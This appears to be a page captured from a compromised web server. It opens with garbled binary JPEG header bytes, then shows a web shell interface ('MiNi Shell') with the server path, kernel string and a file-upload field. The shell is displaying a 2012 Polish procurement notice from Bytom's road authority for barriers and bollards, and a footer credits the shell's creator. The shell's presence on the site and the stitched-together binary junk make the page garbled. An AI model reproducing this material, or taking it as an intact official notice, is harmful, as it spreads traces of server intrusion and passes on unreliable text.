JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120312/76054-N-2012.html

<p class="kh_header"><b>Bytom: Dostawa i montaż barier ochronnych (chodnikowych), barier stalowych (energochłonnych) i słupków blokujących na terenie miasta Bytomia w 2012r.</b><br>
<b>Numer ogłoszenia: 76054 - 2012; data zamieszczenia: 12.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bytom - Miejski Zarząd Dróg i Mostów , ul. Smolenia 35, 41-902 Bytom, woj. śląskie, tel. 032 3969700, faks 032 3969702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzdim.bytom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż barier ochronnych (chodnikowych), barier stalowych (energochłonnych) i słupków blokujących na terenie miasta Bytomia w 2012r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa, montaż, wymiana i naprawa barier ochronnych (chodnikowych), barier stalowych (energochłonnych) i słupków blokujących na terenie miasta Bytomia w 2012, tj. od dnia zawarcia umowy do 31.12.2012r. Szczegółowy opis przedmiotu zamówienia zawiera Załącznik nr 4 do SIWZ.
2. Wzory barierek ochronnych (chodnikowych):
 
 1/ Barierki ochronne (chodnikowe) - wzór nr 1
Barierka z rur stalowych betonowana w podłożu, ocynkowana ogniowo, malowana proszkowo na kolor żółty, moduły skręcane. Moduł (przęsło + słup) - średnica rury - 48,30 mm, grubość ścianki - od 2,9 mm do 3,2 mm.


Wzór nr 1 - Barierki ochronne (chodnikowe).


2/ Barierki ochronne (chodnikowe)  - wzór nr 2
Barierka z rur stalowych, betonowana w podłożu, malowana ręcznie na kolor biało-czerwony (uprzednio pokryta minią). Moduły łączone: średnica rury - 48,30 mm, grubość ścianki - od 2,9 mm do 3,2 mm. Rozstaw słupków co 2,0 m.








 
Wzór nr 2 - Barierki ochronne (chodnikowe)


3/ Barierki ochronne (chodnikowe) ozdobne lakierowane proszkowo w kolorze czarnym - wzór nr 3:
Barierki wykonane:
Przęsło: stal/ ocynk,
Słupek: stal/ ocynk lub żeliwo,
Sposób montażu: na rdzeniu stalowym, z możliwością dostosowania całego ciągu do występujących różnic wysokości niwelety chodnika (możliwość kaskadowego łączenia słupka z przęsłem).
Słupek blokujący ozdobny, wykonany stal/ ocynk lub żeliwo, montowany na rdzeniu stalowym, lakierowany proszkowo na kolor czarny.

Wzór nr 3 - Barierki ochronne (chodnikowe) ozdobne:

       

  

 
 
	
 

 
 
 

 
Słupek blokujący ozdobny (element ze wzoru nr 3) 

4/ Barierki ochronne (chodnikowe)  - wzór nr 4
Barierka z rur stalowych betonowana w podłożu, ocynkowana ogniowo, malowana proszkowo na kolor żółty, moduły skręcane na przegubach. Rozstaw słupków co 1,50 m.

 
 
  
Wzór nr 4 - Barierki ochronne ( chodnikowe)
  
           



 
 

UWAGA: Wymiary barierek wg wzoru nr 2 i nr 4 będą każdorazowo ustalane w zależności od zaistniałej sytuacji (uzupełnianie powstałych w wyniku dewastacji wolnych przestrzeni w ciągu istniejącego wygrodzenia).

TABELA 1 - MATERIAŁ
Lp. - Materiał - Jedn.miary - Orientacyjna (szacunkowa) ilość.
1. Barierka ochronna - chodnikowa wg wzoru nr 1 (w kolorze żółtym) - 1 m - 150.
2. Barierka ochronna - chodnikowa wg wzoru nr 2 (w kolorze biało- czerwonym) - 1 m - 10.
3. Barierka ochronna - chodnikowa wg wzoru nr 3 ozdobna ( w kolorze czarnym) - 1 m - 20.
4. Barierka ochronna - chodnikowa wg wzoru nr 4 (w kolorze żółtym) - 1 m - 20.
5. Stalowa bariera drogowa skrajna SP - 06 / 4 na słupku IPE - bariera drogowa skrajna - 1 m - 70.
6. Stalowa bariera drogowa dzieląca SP -10 / 4 na słupku IPE - bariera drogowa dzieląca - 1 m - 60.
7. Łącznik ukośny prowadnicy typu B (prawy lub lewy) - 1 szt. - 10.
8. Blacha trapezowa grubości 0,5 mm stalowa powlekana do wykonania osłon 
o wysokości 0,8 m przykręcanych na barierkach ochronnych - 1 m2 - 40.
9. Słupek blokujący typu U-12c, metalowy, w kolorze biało-czerwonym 
o wysokości 800 mm ( powyżej niwelety chodnika) i średnicy 120 mm - 1 szt. - 40.
10. Słupek blokujący ozdobny (element ze wzoru nr 3 ) metalowy, w kolorze czarnym o wysokości 1000 mm (powyżej niwelety chodnika) i średnicy 76 mm - 1 szt. - 330.
11. Element odblaskowy do barier drogowych U-1c - 1 szt. - 185.
12. Element początkowy i końcowy separatora ruchu U-25 - 1 szt. - 10
13. Element środkowy separatora ruchu U-25 - 1 szt. - 50.
14. Tablica kierująca prawo/lewoskrętna (osadzana w elemencie środkowym separatora U-25 - zminiaturyzowany odpowiednik znaku U-21) - 1 szt. - 15.

TABELA 2  -  WYKAZ USŁUG
Lp. - Usługa - Jedn.miary - Orientacyjna (szacunkowa) ilość.
1. Montaż barierki ochronnej - chodnikowej ( wzór 1, 2, 3, 4) wraz z kosztami transportu - 1 m - 200.
2. Demontaż barierki ochronnej - chodnikowej ( wzór 1, 2, 3, 4) wraz z kosztami transportu - 1 m - 135.
3. Naprawa - prostowanie uszkodzonego elementu barierki ochronnej - chodnikowej wraz z kosztami transportu ( wzór 1, 2, 3, 4) - 1 m - 20.
4. Montaż bariery ochronnej stalowej skrajnej SP-06 / 4 ( energochłonnej) wraz z kosztami transportu - 1 m - 80.
5. Montaż bariery ochronnej stalowej dzielącej SP-10 / 4 ( energochłonnej) wraz z kosztami transportu - 1 m - 60.
6. Demontaż bariery ochronnej stalowej skrajnej SP-06 / 4 ( energochłonnej) 
wraz z kosztami transportu - 1 m - 80.
7. Demontaż bariery ochronnej stalowej dzielącej SP-10 / 4 ( energochłonnej) 
wraz z kosztami transportu - 1 m - 60.
8. Demontaż blachy trapezowej powlekanej z barierek ochronnych (chodnikowych) przymocowanych na śrubach (osłony)	- 1 m2 - 20.
9. Montaż blachy trapezowej stalowej powlekanej na barierce ochronnej chodnikowej wraz z kosztami transportu (osłony) - 1 m2 - 60.
10. Montaż słupka blokującego typu U-12c lub ozdobnego - 1 szt. - 370.
11. Demontaż słupka blokującego typu U-12c lub zdobnego - 1 szt.	 - 15.
12. Montaż elementu odblaskowego U-1c na barierze drogowej - 1 szt. - 185.
13. Montaż elementów separatora ruchu U-25 - 1 szt. - 40.
14. Demontaż elementów separatora ruchu U-25 - 1 szt. - 25.

3. Podane w SIWZ i załącznikach do SIWZ ilości prac do wykonania są orientacyjne (szacunkowe), mają służyć kalkulacji cenowej, porównania ofert i dokonania wyboru najkorzystniejszej oferty. Faktyczne ilości mogą się różnić od ilości zakładanych (szacowanych), w zależności od faktycznych potrzeb Zamawiającego wynikłych m.in. z konieczności uzupełniania barier wskutek kradzieży, wymiany ze względu na zły stan technicznych lub kolizji, wprowadzanych zmian w organizacji ruchu. Wynagrodzenie wykonawcy stanowić będzie iloczyn faktycznie wykonanych prac i cen jednostkowych podanych w ofercie, do wysokości łącznej ceny ofertowej brutto.
4. Wykonawca winien udzielić gwarancji i rękojmi, nie krótszej niż 36 miesięcy, licząc od dnia końcowego odbioru przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.92.83.00-1, 34.92.81.10-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w kwocie 5.200,00 zł.
2.	Wadium może być wniesione w jednej lub kilku formach, o których mowa w art. 45 ust. 6 ustawy.
3.	W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
1)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego - tj. Gmina Bytom - Miejski Zarząd Dróg i Mostów, 41-902 Bytom ul. Smolenia 35), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
2)	określenie wierzytelności, która ma być zabezpieczona gwarancją,
3)	kwotę gwarancji,
4)	okres ważności gwarancji (nie może być krótszy niż okres związania ofertą),
5)	oświadczenie gwaranta, w którym zobowiązuje się on nieodwołalnie do bezwarunkowej zapłaty kwoty wadium na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek zatrzymania wadium wymienionych w ustawie Prawo zamówień publicznych.
Powyższe zapisy stosuje się również do poręczeń wskazanych w art. 45 ust 6 pkt 2 i 5 ustawy
4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek Zamawiającego: Getin Noble Bank S.A. O/Bytom: 43 1560 1049 0000 9030 0026 9731.
5.	Wadium wnoszone w innych dopuszczalnych formach należy w oryginale złożyć w siedzibie Zamawiającego - 41-902 Bytom, ul. Smolenia 35 (III piętro - pok. nr 25 - Dział Zamówień Publicznych).
6.	Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi wpływ środków na rachunek Zamawiającego i uznanie środków na tym rachunku przed upływem terminu składania ofert.
7.	Zamawiający zwraca wadium w przypadkach wymienionych w art. 46 ustawy. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 1a ustawy.
8.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje dostawy związane z przedmiotem zamówienia i proporcjonalne do przedmiotu zamówienia, tj. wykonał lub wykonuje dostawy wraz z montażem barier ochronnych (chodnikowych) i/lub barier stalowych (energochłonnych) o łącznej wartości co najmniej 160.000,00 zł brutto oraz załączyć dokumenty potwierdzające, że dostawy te zostały wykonane lub są wykonywane należycie.
W przypadku dostaw wykonywanych Zamawiający uzna spełnienie warunku, jeżeli do dnia składania ofert w w/w okresie nastąpiła realizacja dostaw na kwotę co najmniej 160.000,00 zł brutto.

Zamawiający oceni spełnianie w/w warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów określonych w cz. V SIWZ, które weryfikowane będą wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem niżej określonych możliwości i warunków dokonania takiej zmiany:
1/	Zamawiający przewiduje możliwość dokonania zmiany podwykonawcy i/lub części wykonywanego przez niego zakresu prac, bądź wprowadzenia nowego podwykonawcy.
2.	Dokonanie zmiany umowy w zakresie jw. wymaga uprzedniego złożenia na piśmie wniosku Wykonawcy wykazującego zasadność wprowadzenia zmian i zgody Zamawiającego na jej dokonanie lub przedłożenie propozycji zmiany przez Zamawiającego. 
3.	Jakiekolwiek zmiany umowy pod rygorem nieważności wymagają zachowania formy pisemnej w formie aneksu.
4.	Jakiekolwiek zmiany umowy nie powodują zmiany wynagrodzenia Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzdim.bytom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg i Mostów
ul. Smolenia 35 (III piętro, Dział Zamówień Publicznych MZDiM, pok. nr 25)
41-902 Bytom.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2012 godzina 10:00, miejsce: Miejski Zarząd Dróg i Mostów
ul. Smolenia 35 (III piętro, Dział Zamówień Publicznych MZDiM, pok. nr 25)
41-902 Bytom.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com